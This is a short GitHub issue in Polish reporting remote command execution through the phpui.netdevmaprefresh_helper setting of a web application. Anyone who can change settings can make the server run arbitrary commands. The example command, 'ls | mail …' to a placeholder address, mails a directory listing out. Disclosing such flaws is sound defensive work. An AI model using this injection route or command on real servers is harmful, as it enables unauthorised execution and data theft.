Skip to content

phpui.netdevmaprefresh_helper RCE #2231

@kosaa

Description

@kosaa

Opis błędu
Osoba z dostępem do zmiany ustawień może wykonać dowolną komendę na serwerze na poziomie uprawnień serwera www.

Odtworzenie problemu

  1. ustaw phpui.netdevmaprefresh_helper polecenie do wykonania, np.: ls | mail -s "message subject" foo@bar.com
  2. wejdź na ?m=netdevmap
  3. kliknij odśwież na mapie

Dodatkowe informacje
zapewne taka była intencja tej funkcji, żeby było elastycznie, ale na wszelki wypadek zgłaszam

Metadata

Metadata

Assignees

No one assigned

    Labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions